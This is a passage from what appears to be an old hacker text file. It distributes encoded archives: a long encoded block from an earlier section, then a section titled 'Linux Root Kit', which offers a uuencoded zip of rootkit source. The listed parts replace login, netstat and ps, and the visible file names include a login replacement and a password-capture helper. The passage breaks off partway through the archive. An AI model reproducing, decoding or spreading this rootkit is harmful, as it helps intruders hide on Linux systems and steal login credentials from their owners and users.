  9652. hfic5v9lMMmxMqtwx-CvpHQEO6sLhzT1xxunjL1hS317zn86PVkowxtAHV4vo
  9653. hU0phOy8CzQ-nfKoQrddA4+oDKS02Hj17gP2RizeCvMNFs5uMFuvjAQinqHlo
  9654. haCilo7w56sRODfWS3Hkkk1UBaynCXKuM5x-TTlsVZeZjiqBrN04C7fA0VwqQ
  9655. hMCd4YKCnKS-zQapsW4ugW4URytC7TyRupqnYSvO9Uo92UiCaHbG6nrjPCR86
  9656. hIo5Hm9Q-QVt4k2tY+Oq6pTfUTw6i6GZ2+jwwDr75HVAUr7-B+-yWGOQZxf6o
  9657. hkOGXWSJCbM-Yhvx602kcGGEa-DWoto1Q5oA9spk8H9MzaYx-zJOgh-rEVkzx
  9658. h+NhOYFCspWFA-Iw8EwEm4wHQkHPNVaK1vIFiW3Casr20+AH4gKB3Qn+RJ1iO
  9659. h-lYRA-5usyUCp0P66Yb+79C7xN1Xl-dxxDmvWKBTCsULRJkn2EILKkHwXGNn
  9660. hqoZlAhjtt2nw4H1ksK5FlV3-OiNBRik25tq7wo-GRA5GEP0QKHw6WRaLqunb
  9661. hi0EYlCNNIuT+SnkzvGOPmyC8SEIKDnUc1J0OnlnDVXs5-EEQHTr6WHY9UN2+
  9662. hoBhg1-q3QVCSlA8NAo6zUe2iCZW+5iFlLkd1cHEQMtte-XDo2zCWpJQND7zr
  9663. hxTROFyqksojcJ3ZTTOTqH6CpSVrKpbhaLngSa5fTM5zzSwi++FgPq2KlcLT7
  9664. hp3zCyudVA9rDh9DnfUNs+54zpHAppKUmfRTi1XdOvlp6SK0mbaumfbOaaE-a
  9665. huYqQ1l2hXaHu0HhHyypHyBYupfeOSIY2bKVa1uQvUTZOv9nJBvLqcBjegzB-
  9666. hzpkr0-jmpR4ARfSZbOaRPEN2kAFATExgASCopSpay+FA4HODJG0lRRkZL1ED
  9667. hgBbFyafPF5vGdnN61OXfBdZlffMpT3-zIM4JJjym8R+Ougw1+67ClBNdbPLS
  9668. h+LCB7K6-ZPE5TTIA0EN-46BXkxHAUOamRvfSAF+Jc1TIzbihfFd5f8gP794-
  9669. hcHNV2fB3okAK2-RokzDlkB-6Q3fDJDjxkPaduHo32Nre3m+N69M3cngYN9p5
  9670. hD6CExDsZsYJtY+uOvC7IVTMymdGYpY7N400xhcbM72WM3SFdGgmmbjeies5I
  9671. hqmfqucXcEXBI-JGa4EWUwNYjKdT2ss1MFqI-PTlFAhsaeNFd7unJSOwVwE6M
  9672. h1A5EVB5c7sX749FDVTHF1rPKpftnltvhX04KSh5OncgEsy46XKugU6KXISXO
  9673. hjpulBumCTbT6zfjlbE8FPk9-pUarFvJLqkSg2IQBVFrgvCzjz9-LDk92Ae6U
  9674. hlTALnHtY2cfa7oVHyt0CTnXMqTpyNrSDvLpziDirkvpLPDck0g15aLczMryd
  9675. h5upx-z5-5PCR3tU2W3vC+31jSYvBJ9juiKb6jxhbbTGroKoDSuon3Jd2b4Gj
  9676. hfK-avIHCl5CWvNgTdMvk6Rm75aN+sK6nd-7gZNd507dheoBZsEHKNDia9fSC
  9677. hvF0bmfE32BhnHNnYABTer2BOwLXfWRNJOmxuHaE43WHABqnre3M1oTHwW57f
  9678. h02I4t09cwVn51X4wUYMSI46UiBcAYbvoMAybguApo1eOlbkqgY8bcT1kK-jE
  9679. hHxM+N708Fcv0Yr7kHIZH4+w4rYyyOuy7kL4rEXq-Qkr72Z634Q49iDBcvFzN
  9680. hPhHYu6VXivhl7n-fMkEg7GAIxUkMJBUzpadU++orV6Hc-314IFACGo-VKCHD
  9681. hNnDeDZefDOvJsevBnGCOsb5hASPNQ0915rrINp5ABtG7otbXVN1-gH8-H1kS
  9682. hCs21UeGOtGLM8WP5Zq1sM+mFAkoZIO+9GGX5RdBBA+2raHzXNRq12rey2UCn
  9683. hAUUIYL1A4gH2ZkR0M3-+E35dF05As-TCg3O1TkoiQ4KRY82Vz8w1KNVDXcso
  9684. h0Fom3YGBp-Ax63a0M4ysgAaSqdOr+TK6nmhD9c3bC8EqVUHfFSB4423i1deg
  9685. hfUO-5lkm0z9hR-OVlF4tzbUA6VDogRrvtzTPjrZpHWVjF1o7rfPqMVqhmX1P
  9686. hVTyIC1dYi5dQymyVNnBPFo3V320hU0uK3-z21QA8kbMyn8yj2R1pg1WpsZ6D
  9687. hh1nrEjTOUl2YsRXxHg-aTxpzxJS8Q0+Eg-+fg-5NP-sdxGD7IQ+wsZ4BAEkf
  9688. hx-HgW9o2pN8syTduAWSu-6UStZ-+3uC71ysLxmZ5mJ-2lL+QY-KAdXBe+4Jh
  9689. hpMJHYEh7QKEApO6LExrJIHQm0Mb56PfNEmAqBJYIHIOQ5L3+fYHiWUgq+yO3
  9690. hkFnbNAx1AclsQ4c42bKQMxtNGI4-4U1bcuG71UGzVio4ncXPoMQtSXeOZrQR
  9691. hrL0x2Cc2VYyPBM2LTBVFsh7wC1Yk9X6cY2B3OOf4w3nh1vhETRECxiLCeSgp
  9692. hvdgDGerFi5zxc9lZxsQDGh3IAmnqotb+gQ+ny4yS4e18HOAuBbAEmUuNw0ds
  9693. hF3q0kkXH-p6aG6zgr93EEO1DFyGwjoKU6YZgT+dIBd25QwIG6Ph72opWCPkz
  9694. h+KGP7+3CIXAbedrxq6k2tLmGpq6gsGkaxjbqzXp34FnQO1Gsx7HprTjlK82E
  9695. hFkxjqQO91LP6BhV4+dk-VSYtNtUyOhkcuEwba4qxKG-Nk+bVPlM0D16AkZwW
  9696. hYWwI06bXOrZPkVZrwYn2SdB2eNXL+i7y0w1lZEKd3228C1u96DCpe+pcn5Um
  9697. h1qzYG9UEVA1WkSxg86ni6r+lxzRtOjVdo3Z2-A3XfIOVUyXWyISC68Cd5OQZ
  9698. hWAbQNuLUIOAu7sL-423gD+hjz1jS3g9+KY6gRg6+389KObDRMVgjPMTuHkol
  9699. ham7AhoXl6Mu3s7dpKssW4MyKU87TXgTCiLyGkJDRpT9dP-cVTjU13VsnR83p
  9700. hiyVyRLmcUkQa5P0OsVrk+-pfJB1kjctCDFpR5h07-rHs++lqL2sk6lROCIzk
  9701. hLtMV55AYVUVNkv6W7yh01oA7QyWAK0YwcqEEauW0U4e-Jzp3DyyKcOHCSUN9
  9702. hqSGcZZELEVbJbBg9mdEBiB8LZrgmbvvOWqAvZvCmQ+BMDAt1eAY9JUdi7iCF
  9703. hVRqtYwbknjSWMS02gpyjU0ZzO8SzFT91SfvVIXNY9YEBeBXUMLAnKJVYFfZL
  9704. hGJ17qc397W0seWAgaC+EXEyguF02GZKAg+FLmF21O2JAGckWRSSJIODj9Y3R
  9705. hWgVC29aw0Wx-UeFB5sNr3bGVEdmV4k6U2WZ5cclIQ3kw8ku2KO5ZSNUJGF7i
  9706. h0hZTVcDnbUxN-GA2Yn2zIc-OYLEGypSGbg4l2iaYclndyREcRDAZOg5bfpJ9
  9707. h2MtereEF-PllxwitwJAQ27D6w89Q-FRFDwY7mx15PZW7jU7NscfYVqs3cY7b
  9708. hFCWbiGDCzPIqbQClUYrn2JzdXVTTk-ojbimC3pzYXYxG19b4Jmea0AQ81Zag
  9709. h45F6zd-7nHEmb5yEGxuN1qp9JgpMQ4ywrg-XbMoTBy6eCvyqtMU6yCv40Fk4
  9710. hAsZemPMWWsJsVVFjJLYFAWCKqXV2f+HkS1Av12OIpl+oBGmQTbqphryJ8GgE
  9711. h8D4pSIXS04K76mc7J6RIh9DDbpByOKo79KipFV24qcgFrDuuSmKJUcPNAUS4
  9712. hceHZG6mmOioYub9Xa6YcogVE+c7Lc1HihxxrucRpEsI8KEsdEaszja25GfNo
  9713. hFkbQ+fhUjp+llEFny0qIJepqixWlRwK5s0shvWwVOG0QKrn4wsq8MfkFsF4R
  9714. hNoLwg16hSsjwdvU+NkjCIlbW8t36rWA3wi9OawLiIo1jvIc9Vhh8QdTXE4dj
  9715. hJuEKFhkaY+IEHHdT6OBGbmZ02MwZykDv-OjljGdvPOXHKTGEiibPhqyJl0HZ
  9716. hNLdstoOX4xZL00qRGUXlaiPZiLdMCdKdxgyoLeivVK+gaGGDS0yhAq9YDkxO
  9717. hrO3a5-PjdKU4yuryTDh3y3ix5YSyfToaWrQW-S7BqfieTEUQuyBF+LtklYv7
  9718. h1BVJLlVhCqBfDcY8lt1fpvQUfC6R+MzxDgRnTFQQ4QmnUFhrmfM620bTGTl4
  9719. h4KFrUC7tAy6qnZKpgs8w0Oscng0OerG5WXKQ2gj60C5l4mYFHzktxg9RgVTV
  9720. h2pIf8MTqDFCuA+fjJKnEg3HNpKhqoeHEfp9DuuuKf4vrySdKN2ROs3MUTTjQ
  9721. hTWgVslJbYQF3IxMYiWRRzO906jFrvvfe3U7hoGatrjpnnK8rn-foYlB+mVOQ
  9722. hROxoE0wDLyKSmvEbgP-2Xmjfg3FbjRO3IOsmvDpXRGEV-RSck7dXOuzIB2j2
  9723. hXF7zPWgIxce0rjsJxXHUVx8+ToZ3WUrGd8xTTuxw9ibSjp8I+a2-LmxLtijU
  9724. hKz-p6D5pQUKy1eftSWblZFXYeqxbYBytslczzf6PfM3tWZS1qWpHJP8a8bJd
  9725. hSezQO9BkzlaNduySRmwDbtGGSD4NmlrdA6KxdEGCaJsnQ8SvHdBkId3NZ+AK
  9726. hCrHF-Gh5qIsfRsBVrgnUnAUJHUSc-dP4l-EZsXyc9jtbJV0tpeF6-r6tUcJV
  9727. hQFrw4IhVCWhcd1PCpcafsQKdDXlf4HzFkJzGoite8VoRs9+uzoJGlEhZOfwQ
  9728. hrOZyYIB59EAHx-GXsvw6bRtHhmtOd0PcgiPFnH-NGuz9UGYiexYS5IT53nQO
  9729. hw8mIZWdMe00+N8sJlGND90LqVo0W8-8bWuazdyefB1HrOgbGehX8r8gb99Jm
  9730. hhIdAoyOaWkhNaRkW53KaZjVvvD1Z5jCNqAZOWDgIUuihN5HiIsmiJatsb-AE
  9731. hISl2tOO0WZZe8UU2eu+mMsYrayPF84JZQlBgL1uNfJ5zFboXptmVHGefJWWD
  9732. hJYx5aPWmKCTmyoHNH8Lqqjr9QnCLd2FfSLMG+5xiKV72s0tHrml9EBFN9kYZ
  9733. hAMPmNGj99pg9FjTJbmh7uCB3MQDQKcYI+8uU7YOp+ZKOQJW6beTkpNBpWaxt
  9734. hgZslBP6btIN212FwQF2UXrpW1J0qke3e+2Rvcy-V3jrvQZxWwcDnQtpPL5Lu
  9735. hsr0fNQ+m6GxBU6IGzifwFnRsGU7vufXhsIzedJPVjU7+WC1OdvQmFjtoWhRJ
  9736. h0Z-qp0Ic2s+eZ3yvQcvl5LvtBUVhWuuw0F6bVylSWBNHnzFClMNY1A5yr3G+
  9737. hdnsZgeM16IZHgNuYkLej95PHKJbZs6tSAfGX9lhMCagbaNKU2oBsmif1wxbG
  9738. hm7eLuXuL8XS-vhbkFCxThDcR9B2CmuQuwMAvj7FuNcITosYGcnpMjOVtTZxR
  9739. hohHmVJBVC0YBq3x-K62f9IUnyG2d4MFcRBhZKy9RRfpWblAG-zrST0Df4aoU
  9740. hTiwX2uErgTJYo4iLFqhyNGsSLHloVN0R2sQoCVuQBmk-oqqxAuvKwP4fjZSv
  9741. hltddd6mFj6UqLQdilNJu105jJqOFh3gx2xwkSuSKMYZ-mh4wPzLdTP3G713+
  9742. hCMeCSh6ORAiN2To900eLOjUzjese3L4fzFDS6DkATuZIKk7yoVoMdpeDVcXb
  9743. hZMTVmpn7CDX--qNKgcI6q1wPUh9D2UaTFN2dczzAgZNHNi5wK4XFCaayeVB0
  9744. hgCaXVK5jKxq-aZqFBscUYhiguyiop0q+qRl9c6XqaZHSYDhzilCCPDUFuPh6
  9745. hK4bSTadaaTeqIt3L2dT42uM6PmDwxSJJ2Vg2mcV8Ma59WzOwTvKCx+rJXgOB
  9746. h0lw89184AzihQoBvFu1WiE6OrnAQaepX+cxzJA-rBOUpquQukQQz8i+Lb8z8
  9747. hxWUeYtX+GBumxTUFlioaFxKN6nWMtdwBacWqHudANQ2XxbBbOwJdgBHm2BqG
  9748. hovLeqjQDCT6fGB097KuqhiJrIkvXAX7rkLgoCwepirVvdAYG-mh8u6GGPsci
  9749. heJcfnpPZ5QvzmwSg-KQ2mCnKJi2h6bnbEIlLqDwajEJTS5yvZ31BGCtk9lAI
  9750. hU5dWIvh88YZwt-eKpvnNSUNK-vLF1ByVuyXp6mMh-TODgb0k42UUSqMJ98pp
  9751. h-0mxOJ+38y4xeA19Tp8B6V7HvcsT5PrZBkF8nGrYZSNcZhk4miw8l6ecl429
  9752. h5-YHWqYfhc2mT8Y397gtUIiWVZHD5NSKQLVPXMy9-MVrmHv0zqZzChtviQrh
  9753. hjGkIG9QI+S89NNnJqwoxP2krcbAtBlh1PYKhMOUdu8qU8K2yVm+iCDYKho1o
  9754. hQLDnGfcD-nUcWJAqeWJPLfhBhdse0+6Yf3hQ7H4Vz4NHFH+HwWC7k9mrT16a
  9755. husjOQIThrqI5YW4Up6ElGB3vtTLWsY4Aj4VQn3MpieqOGJazR1HXj8irmvRX
  9756. hThYWYBPZ3c1FmT5zwohWvBhT2AgTVPnLyZI5xE9UqwctgvDsOPWsSvGWA3R5
  9757. hdDJCmbOmg0hZ9oJn87LuaH97wryTsuRilAMo0Oswan6F4-Mq1IEmfMbhqTSs
  9758. h4XwgWdb3JNBU4ulbW-WCebmR3j9Ui7glvKYcmX4HhNEAQP1ACpkq0Q-wrHGe
  9759. hoJsm0I-woFFmI6i3ZV4rmtRi4EKhfohl1ex2PxErtBEJ2m4O89oIbt1aORnZ
  9760. hXMzQTnCbfjYnJyv2uQgLVJMAYbaySy19ci4lERvS284uJWGeltnA-53lJmmZ
  9761. hNn59OvLGoy+AZgTW67Ge6wOQJaDG-S8GyodEDgYJTus8qvp8fY8799XuEWpR
  9762. hLGIyjPTm9OeGRJcgWwSmhkH82rpJXeza9rblaYiTje10u0ermOzhHu1E43aH
  9763. h0TyOlhHuW4xk-2vulPccVVDji9gVcoABz96489y53YH+RzXJBmxoPT4FAE2D
  9764. hK6Ctlq+8wF2rf-Dl4qYyELpo+gyNg2NoAkyd6LEa6-QZzuKO1AroVeZwkXzr
  9765. hr5jy2gjM5cNCJDD34lwbbS5ze5qxgQszc-7zOmEn9joC1BeTSIYjlnSIy5ge
  9766. h-FDJ+8qVaco6x+CJ6S8iBN-AFN-DDNhvI1NkSe-kk+ySfDit3bETzA65TUIC
  9767. hDp1o0SGA5EdzcQNm6n7+oyne3moH0OrU6FgUF0qSwdDMaO+oWVvsiz9o4NN3
  9768. h5cLswbl847vCuvRXJXPdl2UA7nfl+zLSXN7rY43ug2cDBzAK41Jv-zhzqpIG
  9769. hrKgSzIMtbPWS4xvUnsMGTxAYyTtCPbkgSxj5YJkqYHA7FdxUP6oylrASy0Ab
  9770. hlAwQDi1LzjkdTS3EjCVImxaqa0zyIUHsxDJkD7xAc08NEqNOxtn6lIO30yu0
  9771. hk07uyQfZIlG89YQh0KMuhHmPN0Ba3NxD282bryM2kScWB07zNck0lz2OSt6A
  9772. hJm39oVSqtSL1NLe0J356a3bsYIQSHw0emnaIPMKgV9ysocPixCBCOJjw9FzN
  9773. hfC9LnP813p2P2Oc6nFryB3Zy6fuOs9p5HtduX7x4R-92s5Tk03Z7h0XsKmWe
  9774. hXB7z+J-9+E6I-Uc++++++0igCW6++++++++++++++++5++++++++++++2+1z
  9775. hEE++++-0MKtdQqUjI2g-+VE43+++++U+j3Bw62gKeAVz-+++QEg+++w+++++
  9776. h+++++E+U+9O-7E+++27VPaZnO0xWMKtdQqUiMp-9+E6I-Uc++++++0igCW6+
  9777. h+++++++++++++++8++++++++++++2+1zER22++-2NKpjPZ-dPaQjI2g-+VE4
  9778. h3+++++U+l4hm6-4QwBdc++++b++++-6++++++++++E+U+9O-yEE++2FZPKxi
  9779. hI4ZiNmxBMKhZNaZgNJ-9+E6I-VE++++6+-pRT00v+gODwGA++Dhc+++E++++
  9780. h++++++2+6+0qUN23++-2NKpjPZ-dPaQjQ4ZiNmtXI2g-+VE40U++++++98ku
  9781. h6U++++++++++++++++U++++++++++++E+Dx-g0Y++2FZPKxiIrIjI2g-+VE4
  9782. h0U++++++98ku6U+++++++++++++++-+++++++++++++E+Dx-pWY++2FZPKxi
  9783. hIrIjIaJbRKlVQWxEGk203+M8+++++++gf1cW++++++++++++++++1k++++++
  9784. h+++++-++zo228U++F4JhPqtHRGxHO43YPrQjI2g-+VE40U++++++98ku6U++
  9785. h++++++++++++++k++++++++++++E+Dx-AGc++2FZPKxiJ4JgPaJo9p-9+E6I
  9786. h-VE++++6+6UvvDHtYwyK1+M++6+A+++J++++++++++2+6+0qUJge++-2NKpj
  9787. hPZFZP4tZR0xVRLFcNKtX9aBEGk203+MI++++0+06Cyno6zQmz1R2++1g++2+
  9788. h3U+++++++++-+0++hc4OA+++F4JhPqtINKliNLEjMqxhPK3iN5AiMp-9+E6I
  9789. h-VE++++6+6UvvDFhVUlZB+I++7E8+++J++++++++++2+6+0qUEJp++-2NKpj
  9790. hPZFZP4tZR0xYNKNdPaJn9aVEGk203+MI++++0+06CynoAfOWU2UE++-YBE++
  9791. h3E+++++++++-+0++hc3gSU++F4JhPqtINKliNLEjNLVoNL7iQmtcI2g-+VE4
  9792. h3+++++U+W1jgx5d4RGdu-+++pkU++-A++++++++++E+U+9O-tsc++2FZPKxi
  9793. hJ4JgPaJo9qNYQqJo9aVEGk203+MI++++0+06CynoK3kRiII2++-h0+++3E++
  9794. h+++++++-+0++hc4GXk++F4JhPqtINKliNLEjNqJiNL7VP0tcI2g-+VE43+++
  9795. h++U+W1jgx+1U9rFr-+++u+k++-Q++++++++++++U+9O-0dE++2FZPKxiJ4Jg
  9796. hPaJo9qldMbFZP4tZR0tVI2g-+VE43+++++U+W1jgx0MtoI9R0U++TFc++-6+
  9797. h+++++++++E+U+9O-hdU++2FZPKxiJ4JgPaJo9qpVOKsiMp-9+E6I-VE++++6
  9798. h+6UvvDFzEijXHk2++-o0+++I++++++++++2+6+0qUQCX++-2NKpjPZFZP4tZ
  9799. hR0xBMKhZNaZgNJ-9+E6I-VE++++6+6UvvDHkdIm0f+U++0QG+++J++++++++
  9800. h++2+6+0qUIGZ++-2NKpjPZFZP4tZR0xiNLFrPr7f9aBEGk203+MI++++0+06
  9801. hCyno1MoeX6M-++-q+U++5U+++++++++-+0++hc2XfU++F4JhPqtINKliNLEj
  9802. hIYJ-F2p39aFZPKxiR4JgPaJoI2g-+VE43+++++U+W1jgxBPltKYh0k++lW++
  9803. h+-6++++++++++E+U+9O-tOw++2FZPKxiJ4JgPaJo9r7dPaQiMp-9+E6I-VE+
  9804. h+++6+6UvvDF+sqQeOEM++1kC+++G++++++++++2+6+0qUI8v++-2NKpjPZFZ
  9805. hP4tZR0xmOKtb9aVEGk203+MI++++0+06CynoJ1WwPtgU++0yN+++3E++++++
  9806. h+++-+0++hc5PkE++F4JhPqtINKliNLEjQrZnLq7nN0tXI2g-+VE43+++++U+
  9807. hW1jgx9mf1ZhMCE++EAw++-E++++++++++E+U+9O-eS6++2FZPKxiJ4JgPaJo
  9808. h9rFZP4tZR0tXI2g-+VE43+++++U+W1jgx+RNQt0N++++DU2++-g+++++++++
  9809. h+E+U+9O-Alk-+2FZPKxiJ4JgPaJo9rFZP4tZR3xXPqpkMLEiO3-9+E6I-VE+
  9810. h+++6+6UvvDEv3RPPK+Y++7QJ+++K++++++++++2+6+0qUEIR+E-2NKpjPZFZ
  9811. hP4tZR0xoNL7hOKtVP0tXI2g-+VE43+++++U+W1jgx4JNmfio1U++KmI++-E+
  9812. h+++++++++E+U+9O-YGM-+2FZPKxiJ4JgPaJo9rFiAn6rA0tXI2g-+VE43+++
  9813. h++U+W1jgxBS2x5am-+++B+Y++-A++++++++++E+U+9O-RnI-+2FZPKxiJ4Jg
  9814. hPaJo9rFtQ4Jn9aVEGk203+MI++++0+06CynofMF8AvcJ++-NJE++3k++++++
  9815. h+++-+0++hc3OCU2+F4JhPqtINKliNLEjRLFdP4ZoOKJn9aBEGkI4+++++-o+
  9816. A5E-I-k++GJ+-++++
  9817. +
  9818. end
  9819. sum -r/size 30187/121254 section (from "begin" to "end")
  9820. sum -r/size 44118/87987 entire input file
  9821.  
  9822. 3. Linux Root Kit - uuencoded
  9823.  
  9824. This linux root kit includes: Login, Netstat, Old Netstat, and, PS.
  9825.  
  9826. begin 664 lroot.zip
  9827. M4$L#!`H``````+2^1"+=R\9L*````"@````.````;&EN=7@N<F]O="YK:714
  9828. M:&ES(&ES('1H92!L:6YU>"!R;V]T(&MI="`M(&AA=F4@<'5N(0T*4$L#!`H`
  9829. M`````+(;/B(````````````````&````;&]G:6XO4$L#!!0````(`'2>2QW)
  9830. MZQYI=P0``-<+```+````;&]G:6XO9FEX+F.]5EEOXS80?I9^Q6R*NI*M.));
  9831. M(,%JY9?6!A8-TH=TGU(CD"7*)F)3!DDE<1;Y[YTA1?FHD^T!U#`DS7".;PX.
  9832. M>='WH>]5_)G)84&?\RU\+ADR@"@NU(9+5D(M0#7K80&Y*.$VYT+?ZES#:!BC
  9833. MV(7O?\=%L6I*!I_45EWH[8:IX7)\Q%:H\E>NYFMVQ-4EKP]9C>#()9Z_1N\0
  9834. MY')11/AX#'T$XQ&9^L4REUZ_3^S4_^I[C5!\(0B^Y(O[0A91T4C)A#;?FJTW
  9835. MZ9X0:4/)JRJ)Z#F*YDUU-XIG*&,,(UA445K>);'AXF=3:/`H+J`'*G1LC^)Z
  9836. MS%=0T<?=:!9!35\1"'H=RKW4@H%^(3BK6BS`V]2*:UX+9$P_7T^\/AG&0,'C
  9837. M$18G2U+?1T9E$_'IIQ"^-BI?L"!,V3/701*FK[YOD)'$XUTRBWHMQ#!M5;&B
  9838. MNT67HO!#%H?@C!P)8A2]O10>R:*_C4205="E*CHK-O"]PO]9Y%R9]X\S,F[E
  9839. M=N*&]TT;HYFS]88-WS-ES`(75"]^GD[#\V`/NV6A/K5!MK\R,,JA$9A.4:*J
  9840. M9<"S..6?KE(^&(2^A[T%`)0:TNXE(=`;,DN/Q\@80/Q\%<=Q:D392C'C"<;C
  9841. M#+!ZWJL%.<J"0Y1Q'(['5XC56#X$24^#;O0_H"-]HW#>M4:6H:I-K7F>)ZZ5
  9842. M@@K-5_6&B:ZCX$P.YF=A"%D&-U^NK[%%C3.H;(&QK73)I$1!,W\^PL^Y^$$#
  9843. M&<%:_R'.(M@K,VGNNA+Q58JQAZ"*XNOH=C+Y]7YR\PNMN)V359JM5D$5GB>7
  9844. MZ4[:+5N=V\GOI%-)EI<!;HTHN8R2J`H/THKZ-J]M4FDL\)EI_3:B+B87DHOH
  9845. M.E<:DDN8;S53(&H-+TS6&)J+Z$U-FPN:P\62%0^X`P^U<`;$'35'_`^6:@N'
  9846. MZPX=P8UGMF!IQ[FRG)'EO)L=6G^27+.C#%$-BE6M&"8Y]7S/>BZ6Z[KLFJ`=
  9847. M.4.E[Y'-0@?JC:AO:M@PN>9*(0C0-<UDL6!`NCC$,8-X#!5+#'_%=ODX:`N'
  9848. MHGX2IU`TO-PG%[S\MYC0`9-_&Y0]!>+94#_>*U9X&>RAR-L3P0HEIX76K9`Y
  9849. M/DY*%`=FK*\&I;)]NX;1V3`4-9)+W()I6JNK,M\&/7MB]?!D^E:6;+_2/@+2
  9850. M@;H"M/!NC=2!*_$/7:'V"4^=\8;65-<!)@/&,.Q^[]K?=1ZOML;3SH5Z*TFX
  9851. M+)ENI(`8=P2>P#YN7-J-*Q;1`&UO*$2G?G?QZ./2X7T%M=KSGD=0M)<`,)<`
  9852. M<S\09J!8$0^Q5ZL%SM_XQ#0VKG$4_\=!3&;<]+$1=L6D"(UOSZ)JB:<EJB"4
  9853. M`FELJ@*'1`@?,IC\-NT`6(7!H#7<7C5Z<8+#MK5+C!,GECFR6B%W9A&;Z$%F
  9854. M4N;('N)Q9Z6;CA@M;EP#J85BD]A!>3,UIL.M>NVRXY+3#42RC#35-;.E;',6
  9855. M(QN[HKVJ4<F/>_`++7UL6^UD@YK++!=XLY1LL\H+ML9["\SSXJ'96+U7_T]0
  9856. M2P,$%`````@`SIU+'9:Y)I?9`0``;@,```\```!L;V=I;B]G971P87-S+F.%
  9857. M4E%KVS`0?I9^Q<UAB9R:NMO+!F[VTJ5=("S09(RQE.+(4BWF2D*2.\+2_?:>
  9858. M;&\CT-$7V7?Z[KO[OM-(:=ZTE8!S'RIE3NL/=/0W%82[5\8?)R77H3E.M5IA
  9859. M]7'.[WVN#.^A=%0)J;0@F\TWDN25>,A#V">4YE-8>-\*L,[<VP"EKL"),AZV
  9860. MV<-/%6H0O#806J=%!49*F.:4UZ6#Z9T(MO2><:-]@#XW$*7T%R4^N)8'&%0`
  9861. M=MQE>/CRH:"DAW.+OTIC-7XO%\LY3!%1Q-HR*-Z3VETKO[]Y^_ZFH`B6P!AB
  9862. M8`:R,E9HUATH+(/5[?7'K]=I!HE+TA1F,_C\9;E,*2%]0;18([EHO,"D%P&9
  9863. M(UD&K)\G[0JZ/M$[)E4CM(D09-U<7,TWZPS&44E:O(A!H1U5A)_RVT8VY1V,
  9864. M9_";S2\^K0Z+]>+JORSKHTZ42.O0)LE0@G`.%;[V2?;'[`*D;%I?#[==`;<H
  9865. M.#J'':1QP(HB!5P*X9C'S?&N%5ZBHXQ'KR9;-X'#`89`_POFJ\MH(MGAT_C1
  9866. MEZ!A%LYA/.SFW4T'P'V>G"!_W.8CC2%$JK/),Q*2K=OJY-G97W"D][4;(N[U
  9867. MU;#8.('DC?%BD$:)$_'=LC@DQH_T"5!+`P04````"`"YG4L=PB>=?<8B``"D
  9868. M6@``#0```&QO9VEN+VQO9VEN+F.]7'MWVDBR_QL^18<YB24',/8DLY,PR5QB
  9869. MXX0-!B_@3;))#E=&`C0&22L).]YL[F>_]:OJU@/LS.R]>S8GQR#UJ[JZWE7-
  9870. MP;Z:+/U$17&XB)VUHJ^N%_O7GJOF<;A63YH_JE?C$Y6$\_3&B3WE!"YUJBJE
  9871. MDLWE;]XL56FHTJ6G9F%T&_N+9:J",/5GGKKT5N%-LXJN$VJ/PIC[OCEO7+Q7
  9872. M2R>A#EZ@UM3YVDEIO<M;GL</9D[D7/HK/[W%V'"N]N)5N/"#O0/]Q=U3-#SR
  9873. M8CW93\VGR@)@?VJV;(8G=H)D3NTWU#F\48G_#R\14(Z73K#PDN?\T%"OO<"+
  9874. MG96>"#`ZJ1\&3761>%AZ[LP`B>\EV)9RKAU_Y5RN/(Q6!*L>:'G-15,E7AK%
  9875. M?A@3Y':^0V_EK_T`6VS*J(MT'1W<T!_J$[@K/UCDG0$!.@ITC#=],IN$8,!1
  9876. MS,+U&INE@01B!'`3;/K20Q\W@VP6!@&=#S43&M*E8A!S#/I-CQX#[T8)<LV:
  9877. M;\[5W'/234S+K;QYJL)-^EQE_ZCS`A`3;BX=5\8J)TV]=90F6/;`2V<'E[2[
  9878. M>K5"_S"&CO56@7@2+V`:2&X3&EC-.D1.DMR$L:N\+Y$?W^8->_M\U+)*LO16
  9879. MJ[IR7*+`5/ES=1MN5.!Y>-3``S_?@?[OFS!UU&SIS:Z2>Q<W[YW`6=TFQ!"T
  9880. MU=2+<88KE=Y&GK)2.FFSCGW7TNDR#F\"0D>V]MB;;4`8&0(S-!BR^)U_S*:Q
  9881. M]_>-CP6P=9IAZ5P32RI+R,8VB#5;H$<Z&-5H@#-`.#22:6&K7X[OOI.DU+)G
  9882. MMF*HHD-PI\!$X*>TB47,'ZZ7$C\D.?DZ[F^;!,Q,QS5WKL--3&-D>\PH=:%"
  9883. MII$$&/%HFCK-,W<VJY2.(ETF+&(@";S@VH_#8$U$(U-<.[$/YJ,N2>(O`A$:
  9884. M>V7Z?><I-U3[Q*U+0O,^X]E+-]&!LZ)35``[(2;WZFH3N)D(28%=D6M*,Y,;
  9885. M$G_1_`O`>*#YYB#U5H&7N@<)(5.AA[=*-);._-G2\5;J]8H8PUK0W_]R'>+]
  9886. MIGMEL^@)U]$&,(QGOA>0A#SQ(B=.S?XZ3KS<).HB(.D;)UKZG7C!VHFO>/[#
  9887. M9\]:C=:?&JTGYO&PT7K6.'JBL-9SO9.?Z:1!#L^WJ*I!`NP&-+[R9^GJ%DB!
  9888. M3`L:EZMP=@6*7(<NMD2GD<QB/TK#F)C$#$[2>.;0D9'4\A.>"K"#(GA9#=!1
  9889. MHT7_GQ(`WG-USD3)1YFDF_D<>.W[P>:+:C4/CZK[!QA4/=BOJGW"C=$>ULRF
  9890. MF7YNU?'W3_SW9Q:$(V]!F!)VI,<<3WAS[*S\>1@'OM/$=)W52O%T8)G$BZ]9
  9891. M^/)*(\_U:3/^Y89%(XB-Q"8(-B%RG8F&NR1FCV\5S;A.6')%$``DY5Q,02+Y
  9892. MVG=Y:T[*P#B7X?4=*E`H&>K5B1V2XM$2DV$*=X-S<#2K.`1NLIDMS8*!GMH)
  9893. MB,?"V08DPGJICK&.2QM/_83/C*8@IE@E=1Y%1$_TE;VDS:]X#3`!S<\KW[5[
  9894. M9W9%1[KRW(67;RK3^3<.K()KTN>1($"KZON.H*Y>>?&5M_)NFZ+[`V?MZ7/#
  9895. M\,*XM7/+BE4K+P#JD<J.H7UC()KL`]:![F:69K8))F'SA)&;PTFBC>2]2B)O
  9896. MYL_]F6)MK&X@K*!;<88D.$B]8X+)F]Y8C8>GDW>=45?1]_/1\*^]D^Z)^N__
  9897. M[HSIQ=Z>Z@Q.U+O>Y,WP8D+?/ZCN^_-1=SQ6PQ%FZ)V=]WO4GR88=0:37G=<
  9898. M5[W!<?_BI#=X7<\&]GMGO4EGTAL.ZK1HUPS##/E(-3Q59]W1\1L\ONKU>Y,/
  9899. MO/II;S+`BJ?#$0GA\\YHTCN^Z'=&ZOQB=#X<=[&5@VKU!W].TFP.HR"MDAB*
